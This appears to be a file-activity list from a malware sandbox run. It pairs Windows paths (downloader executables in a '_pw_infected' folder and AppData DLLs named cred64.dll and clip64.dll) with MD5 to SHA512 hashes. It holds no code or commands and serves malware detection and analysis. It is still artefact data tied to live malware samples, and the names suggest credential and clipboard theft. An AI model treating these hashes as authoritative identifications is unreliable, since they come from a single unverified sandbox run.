SHA256 0a17e2ca8f223de67c0864fac1d24c7bb2d0c796c46e9ce04e4dff374c577ea1
SHA512 181b1e2bd08978b6ee3da2b48e0b113623b85c42ab8cec2a23bd5119aba7105fdeef9b7b00343d37b0c8344494640ce0a51615393def8242334420134f75871f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

MD5 1d9815f6071521d3f1f4f3e06e9e1e76
SHA1 7aa931319c7cad5c58b30d95a6f3d5d34b396d3e
SHA256 0de422fd063c53831734ce8298827b9f9983903004d3f29a3b419dce3a667b01
SHA512 1829cfd39d0119a3d93b3adbfd51bccb5732992e32e8fb1a73ee35618598a27f401fa418bc92675a005e01ef175cc38959258bb50dafb61b44af6f78f16066e1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe

MD5 c7174152bc891a4d374467523371ff11
SHA1 6ae1bdfcc4f8752842bdfa49a57709512c5a14c5
SHA256 fc4021427512de18c4f01d85a3fe16f424234a62bdbfcac7a7b818797365113d
SHA512 79823229323c202f92ffcc593be110ef1e2fcc13f812fae978957cc5ace71abc86e10d9e0a3b8ee4f83292b6f7c3186239fdd0110923ad01932c4adec3b67fe6

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ctx.exe

MD5 4962575a2378d5c72e7a836ea766e2ad
SHA1 549964178b12017622d3cbdda6dbfdef0904e7e2
SHA256 eff5fad47b9c739b09e760813b2bcbb0788eb35598f72e64ff95c794e72e6676
SHA512 911a59f7a6785dd09a57dcd6d977b8abd5e160bd613786e871a1e92377c9e6f3b85fe3037431754bbdb1212e153776efca5fadac1de6b2ad474253da176e8e53

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\vvv.exe

MD5 99f996079094ad472d9720b2abd57291
SHA1 1ff6e7cafeaf71a5debbc0bb4db9118a9d9de945
SHA256 833fd615ec3e7576960a872fff5a4459b0c756338068f87341655849d1f7e1af
SHA512 6a6d4034b37f9bb3b4a0b455de7485b990bf3bd3042316d7261bd2973dbe522490654045d579a6df58a4b834e04c377897eea41798e6b1f5fdbc45a2bb0d127f

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 a18dd3c883876a45a4eaa86f5a7f0e84
SHA1 ae45f43e0adfba483a36e4b40fa1816631abd24d
SHA256 720ed3567096f3eaeed70facba39d7ef74bd81e7fbf9c2f9417cacbffe997a97
SHA512 bd3ea4bb833063160395b14d15429f2cb7a4202c4c84817a08778b1100520c2ca751b78cca2208ecb16d5f818e0ef76a1be618e70a21a7c4344951b5d452bb7d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 6538513b18db417f75de94bc60f7d9c1
SHA1 a14cd0669d49a280e98c9006498e17af201fa0ef
SHA256 926f515daa2f28013660c1171cc254237affecc8679f3a14bf426a24b37c293d
SHA512 406835a5e69448baab4859da64c0cf41fc6837371611c7c0b44436fc344a008baaaab830e4b13a6a796ba0a7ee7049e2a2febd50ef5ad11497aa82cb64fd4c1e

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Temp\TCD55C4.tmp\iso690.xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

MD5 e43c565949b9e2d504ade5ec0282dd07
SHA1 4ff5ed6ff055115f5fed5a6a9bff9eeb3ad6a140
SHA256 d94f09ef2563b3de209ed5b48021a99cca1f9536e35a0de14d51806e05ab8d69
SHA512 fe7856801f0c0e652329c295a8cd07bba4150249e8b144832789adeed7c0eb1b2e760fe8e712ef075bce3a9baf2b81be9684081b64ede6dc92a4d1da9ff5a953

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\connect.exe

MD5 1a36cf24b944aaa197043b753b0a6489
SHA1 ecd13b536536fae303df439e8b6c8967b16d38b5
SHA256 b04789056a7934edce4956963a37abed9558febe44cc83ada5e3a5708caa11cc
SHA512 ef2c20de078b3ce2e34cb57f6789f60c4e801d3ca76b6a86247d985bc8e6a0ec723f4cd157625094c5345f4209eeef6ecec949586cbb53fe24e7c34d7778e368

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 2451fc4cda296658e2f4e0270feb8778
SHA1 796984a95ecea713cf4335de9ae4052adbf33c2f
SHA256 7454b054c73a86e0a841f90d21d97d4159b0aeb9e4cedb57e24c5ad0fbff55b8
SHA512 2526076bc050858bc6fd18ff7f9daf3c020d56f496b433d52586a51c6af6b6d234678b18ce102c8513f548dc8225c9cb8f316ffd04ca216583810e1f07965ecd

C:\Users\Admin\Desktop\hosts.txt

MD5 eeea48303c423557de1f85d661c93e27
SHA1 ac6f851df1a554ddfddf983664b60be143be76c9
SHA256 5ad0743d139f93931d848073506f3acd0d24c3abd530732e3862e07571548e98
SHA512 201c4fd8d95bee7db480c69291fb20b13cfefaf19a9026fb36613461e637313a16264728cf7b4a48e64d446df7548c7b3a2db81a1ace2c54be2776a30a6e05cb

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzureConnect.exe

MD5 4afb95fbf1d102bb7b01e7ea40efc57c
SHA1 7753e2e22808ac25bc9e9b6b5c93e28154457433
SHA256 12a1ee910e42c3b85491cd8006e96062e14c87d64996e5223f3713cbb4077caa
SHA512 d97607e607b81432cf9ea1b71277bf632cbdd25a10fb9b3e019c314bbbba4b715959c4f6e4b406ad8accbe2f7407491f18c7d61f05776778e78a579214e934eb

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

MD5 7faa7179268be819c9e9028df0fa0893
SHA1 20da9efc6d1a7dfc6db38a4b34a74b41d3ddc29b
SHA256 49d62cef712a77b670e825bb408b70c37c630e758253da8193191811d4fd70f5
SHA512 b650a71310c20d5ef08abc4143eb4df3e3398ff6d0a1193066126f3d88e8751c92524d952efb593b5dd7f384d739502766b2147de07a15a593a89df71a4dcf47

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

MD5 a57d9f055b815f18280ea2989aa51521
SHA1 925d0844882b8dd4720614e012c527a290c8329d
SHA256 cf892e11c6793e8397cf2b51f7ffd32e39889be5c6b092b14381236a6d1c4ccb
SHA512 d5637e3440ada3921ed05a5e80b0fa9f9a561aeb5b7d8e536e1d097268c9e8c5c530f3dff9c2f6fa3220c20b74b901544fd36a27c536bf3761388dbdccbfaf41

C:\Users\Admin\AppData\Local\Temp\565375082730

MD5 150aa48673b1949282cea70f73a1e700
SHA1 5221eb9f51cbbdc0303ee719dc59905d91964699
SHA256 a866c1d5d74d855199136c350db55a08298fa49498795729a3fa612a0b417701
SHA512 13fe514fa34731bb090f5c547b319301d5790f9d532f3830150d639d14e4a41ab0a3ea1ea1efe66e9fcf4ee21104d402118a1e31cd9f44591c58818e623ee498

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Javvvum.exe

MD5 aed024049f525c8ae6671ebdd7001c30
SHA1 fadd86e0ce140dc18f33193564d0355b02ee9b05
SHA256 9c45c5456167f65156faa1313ad8bbaffb8aa375669bf756fe0273580a621494
SHA512 ec0846be717d200639c529a4ac14f47f6b466fa2c8231049bc474183b285c7d8ce3200ff9f9c813171de8b7eb15c63f229b4748c751a167d7eff3489249738d2

C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll

MD5 c6aabb27450f1a9939a417e86bf53217
SHA1 b8ef3bb7575139fd6997379415d7119e452b5fc4
SHA256 b91a3743c7399aee454491862e015ef6fc668a25d1aa2816e065a86a03f6be35
SHA512 e5fe205cb0f419e0a320488d6fa4a70e5ed58f25b570b41412ebd4f32bbe504ff75acb20bfea22513102630cf653a41e5090051f20af2ed3aadb53ce16a05944

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 76025b9fb7201faad57e95ac873e37eb
SHA1 25c01eb7d9a63723eac365d764e96e45e953a5c1
SHA256 03bb8cf70d96e562ff19d80ef9a01f8255aaa1a6ffa2005dbc004bb718e05269
SHA512 6f5c8680823f3fc01c4668585518a1a535959ec456bca88f81eebe0484dc6cf6bbc40044db4ac7d18798529a20feca039bd986f243db817f27df220a7917a28f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f9c8920fe8b321eb2fa11bc15993a2f8
SHA1 27a0ffe024a4a9ef73dc83a665255641b8c9c2d0
SHA256 fa5da076158c2fa32859be6ca10904246ce539a783f2eb4e17a2277d0fc67be8
SHA512 dc95e41401cb5ab0f77bb944aacdf631c2dedbd811b8e0f39aba412d48a463ed248e689e48b375b02eea8f88d722b8236921562ca516f73b8f42e92ae67e4b72

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\5bcde959-433c-423d-81dc-9f79674949c9.tmp

MD5 3c791f5249bf93862d906103974c3523
SHA1 a823199373a4b250124967709132b51493bb0eb8
SHA256 910c67062cf603f7dc25e67fd9bb6be0af1401ee702406347df3151d66be6366
SHA512 c639800204e57b1d3eabdc3b8f346523381edd9ade6978439b45af8abb9d696be5f6a4fc7bda6d5c3637b08142ecdb30bd4ee6936db2f856a741ded1589a7418

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\random.exe

MD5 3a425626cbd40345f5b8dddd6b2b9efa
SHA1 7b50e108e293e54c15dce816552356f424eea97a
SHA256 ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1
SHA512 a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\client.exe

MD5 52a3c7712a84a0f17e9602828bf2e86d
SHA1 15fca5f393bc320b6c4d22580fe7d2f3a1970ac2
SHA256 afa87c0232de627e818d62578bde4809d8d91a3021bc4b5bdb678767844e2288
SHA512 892e084cfe823d820b00381625edda702a561be82c24a3e2701a1b2a397d4fc49e45ca80ac93a60d46efc83b224a6dc7ea1ea85f74ee8a27220a666b3f7ebfac

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 5391d0162a521a0f24e088523226b26c
SHA1 fd3a146107ecc04dfb27835772c9ac45349fe568
SHA256 ce8340c239ef1f8981d8bd1eb1624660778cf2c15e1fb91c56db48e473789ea4
SHA512 b5413834344815455b998ebbfcb0da1da90d2190b20fce557cc72bff79f236c7a050c0b9d4f3ad31f13f74496f82a757534b7d74b8cb6da28ca79c4f6e5aaefa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 dc8494fac8e05865b69c41a4cfadbfb2
SHA1 e887e73f63911fb39841e82f062d741b59ea029c
SHA256 3c08e84c73e9d838b0d536048a3287cbd9b0e844e86dcfa1501ec6a341376a51
SHA512 7a1c9496a84272525b2a7b5ba1f3d22f0c9e226f354c9f68f4a110ed9eb8564cd75adbafeb0f665c4cbcc21c2f19c6876e8b444c338fa65dbfe4499cdd5489df

C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll

MD5 c2f3fbbbe6d5f48a71b6b168b1485866
SHA1 1cd56cfc2dc07880b65bd8a1f5b7147633f5d553
SHA256 c7ed512058bc924045144daa16701da10f244ac12a5ea2de901e59dce6470839
SHA512 e211f18c2850987529336e0d20aa894533c1f6a8ae6745e320fd394a9481d3a956c719ac29627afd783e36e5429c0325b98e60aee2a830e75323c276c72f845a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\88ab67c2-aa7b-4b44-b37e-656d7fc2b757.tmp

MD5 9da54d489c1462f05625eda261a812e4
SHA1 46c07587011f3a28c0c075214182841fb6fb2dc3
SHA256 982c96037fd7a76ed24bec3480ce9a520591163c943d87db6c66f25e3b69fa94
SHA512 78cf67f71c9c844d379214256b8d3b96b9fd3e64881c6e635a64a4e8adf3bb1c745ecee82130db602283674e9448be880bfaf85e6ef98a0acf088570479eab21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 30a145d07c2e62d05e34afd1cf0562d8
SHA1 d802c12415a401255b66ac6c085f99e1e42d58f8
SHA256 48f5f2c72c7e6459cde0d6e495817f365fd8d0f26229c15bd64b47060e518e50
SHA512 b1c17acaa281e0c792951a5032c5f4e66f03084215a8e631f1cf462e48560098c942da220f1bd06eac68effd3e73f9732c24cab714bf7365e4f71689b3fa0814

C:\ProgramData\fdgfghgfhg\logs.dat

MD5 e5452bd37e07ea03b62fabb8313fc416
SHA1 a370c9e527eb3b613f6c5218c1353740ae5a962c
SHA256 b7f096c66f0d5e03302359fd9c442b4c91b07f5df3ced84ccf601c3b94494e29
SHA512 836d2d30ddd30188fb90322268869cac6acd36cfc790029c905a6369a02d84d5cffcba7205514a15a440dbefaaafee17cad651860db2aa02d029e8a40e6a8ed4

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\l4.exe

MD5 d68f79c459ee4ae03b76fa5ba151a41f
SHA1 bfa641085d59d58993ba98ac9ee376f898ee5f7b
SHA256 aa50c900e210abb6be7d2420d9d5ae34c66818e0491aabd141421d175211fed6
SHA512 bd4ef3e3708df81d53b2e9050447032e8dcdcc776cf0353077310f208a30dab8f31d6ec6769d47fb6c05c642bdd7a58fb4f93d9d28e2de0efc01312fbc5e391e

C:\ProgramData\registro\registros.dat

MD5 0ea9c8ff992a7b4b2acfd924877013f2
SHA1 d982838dc317209f4b2dc2ff62fcdb174837b206
SHA256 3701c19cafcd96152d6107979b33c3728a6dec6a014e1303abb2c9a6eab0df74
SHA512 c005eb6185306ac00fc49e6ce3791e43b52d83c9a4c394c2525d92057418c19d1aa5fa92e67f2869e84b73caac5f88ed6de38c9a460aa38c3ad450cc729d01af

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzVRM7c.exe

MD5 3567cb15156760b2f111512ffdbc1451
SHA1 2fdb1f235fc5a9a32477dab4220ece5fda1539d4
SHA256 0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
SHA512 e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba

C:\ProgramData\fdgfghgfhg\logs.dat

MD5 a77e2262ad1ba580c1c97132986bbe46
SHA1 ffa8963a0d4fb7378537664c486a63d2a3314a76
SHA256 6a602726dfe7af9a7ed7adf93bac5938f7f6e8b26211f514188d944ea5b373b7
SHA512 e2894aa689b350e709123fb6b625c1f455dfdd0b5e594673ea5d5189b2dee6e462b9d4923bd86c8736eb73288b1d8d3009628cf479a228c24ebf47b7aa1bd66e

C:\ProgramData\registro\registros.dat

MD5 7929e4bce367ad1eb0d570c2d8df6a58
SHA1 4c864fd07869e11bd5a2ad36853cf3fb287e14be
SHA256 65456ef85679c46a963863a9ceace9a24f1dedfd46eea654f15d17b449a4e0e5
SHA512 db5c94a263f72290b99aba227d7b583cb8defe84c641d440573a57d250026cafe487c41de6a2a5d30d3184002fea8850e36632c56a85135ba94a888b5336929a